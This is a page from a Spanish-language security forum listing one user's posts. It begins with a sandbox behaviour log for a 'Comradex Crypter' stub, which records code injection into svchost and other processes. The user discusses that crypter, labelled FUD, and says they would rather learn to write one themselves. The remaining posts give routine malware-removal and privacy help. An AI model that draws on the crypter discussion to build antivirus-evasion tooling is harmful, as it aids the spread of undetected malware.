   * Creates a mutex "CTF.TimListCache.FMPDefaultS-1-5-21-1482476501-1202660629-1957994488-1003MUTEX.DefaultS-1-5-21-1482476501-1202660629-1957994488-1003".
   * Creates process "C:\WINDOWS\system32\svchost.exe,(null),(null)".
   * Injects code into process "c:\windows\system32\svchost.exe".
   * Enumerates running processes.
   * Injects code into process "c:\windows\system32\dwwin.exe".
   * Creates a mutex "SHIMLIB_LOG_MUTEX".
   * Creates a mutex "Local\_!MSFTHISTORY!_".
   * Creates a mutex "Local\c:!documents and settings!r32!configuración local!archivos temporales de internet!content.ie5!".
   * Creates a mutex "Local\c:!documents and settings!r32!cookies!".
   * Creates a mutex "Local\c:!documents and settings!r32!configuración local!historial!history.ie5!".
   * Creates a mutex "RasPbFile".
   * Opens a service named "RASMAN".
   * Lists all entry names in a remote access phone book.
   * Opens a service named "Sens".
   * Creates a mutex "MSCTF.Shared.MUTEX.EBH".
   * Creates process "(null),C:\WINDOWS\system32\drwtsn32 -p 1796 -e 340 -g,(null)".
   * Injects code into process "c:\windows\system32\drwtsn32.exe".
   * Creates an event named "DbgEngEvent_00000070".
   * Injects code into process "c:\documents and settings\r32\mis documentos\descargas\comradex crypter\stub_unc.exe".
   * Terminates process "à?¤\dee\harskvol1\do".
886  Seguridad Informática / Seguridad / Re: Comradex Crypter Fud By dr.fan0 en: 10 Febrero 2013, 01:57 am
Anubis no detectó conexiones, si el uso de la librería:
IDA:




PE Explorer:



Crea el proceso svchost:



Estoy buscando algun timer o similar, algo no cuadra, bueno si que prefiero aprender a programarme uno que usar ese.

Editado: En Indetectables no han dicho nada, incluso tienen su propio foro (comradex.co), voy a registrarme a ver que veo.

Saludos.
887  Seguridad Informática / Seguridad / Re: ¿Cuál es la forma más segura de eliminar un archivo del disco? en: 9 Febrero 2013, 13:22 pm
Hay varios programas como Eraser, Disk Wipe, Hardwipe, Trituradora.
Comentarte que algunas herramientas como CCleaner permiten el borrado "seguro" de archivos mediante varios métodos:
Sobrescritura simple (1 pasada) ... utilizada por defecto.
Sobrescritura avanzada (3 pasadas)
Sobrescritura compleja (7 pasadas)
Sobrescritura muy compleja (35 pasadas)

A más pasadas haga, más dificil será recuperar, aunque el tiempo se demora en archivos grandes en la escritura muy compleja.

Saludos.
888  Seguridad Informática / Seguridad / Re: [AYUDA] Esto es normal? [URGENTE] en: 9 Febrero 2013, 13:13 pm
La carpeta puede estar relacionada con Windows Update, representan las actualizaciones de los service pack y actulizaciones.
Te surgió algún problemas con Windows Update?

Con respecto a la entrada que se ejecuta junto al sistema, el Sidebar de Windows es la barra lateral a la que puedes añadir el reloj, calendario, uso de rm y cpu, etc.
Si no la usas puedes destildar la entrada y ya no se ejecutará.

Saludos.
889  Seguridad Informática / Seguridad / Re: Anuncios De Lance Armstrong Y Discovery En Mi Maquina en: 6 Febrero 2013, 15:20 pm
Probaste instalar algun plugin para bloquear publi, tipo Adblock plus:
http://es.wikipedia.org/wiki/Adblock_Plus

Creo que te lo solucionaría, te dejo el link para Chrome:

https://chrome.google.com/webstore/detail/adblock-plus/cfhdojbkjhnklbpkdaibdccddilifddb?hl=es

Saludos.
890  Seguridad Informática / Seguridad / Re: Me han metido un virus y no se como en: 6 Febrero 2013, 14:55 pm
No veo ningun troyano, si usas LogMeIn legitimamente no se ve nada raro.
Te han modificado la página de inicio de I.Explorer, si te pasa también en Chrome entra a la configuración y cambia el motor de búsqueda:

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = hxtp://google.icq.com/search/search_frame.php
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = hxtp://websearch.just-browse.info/

Saludos.
Páginas: 1 ... 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 [89] 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 ... 123
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines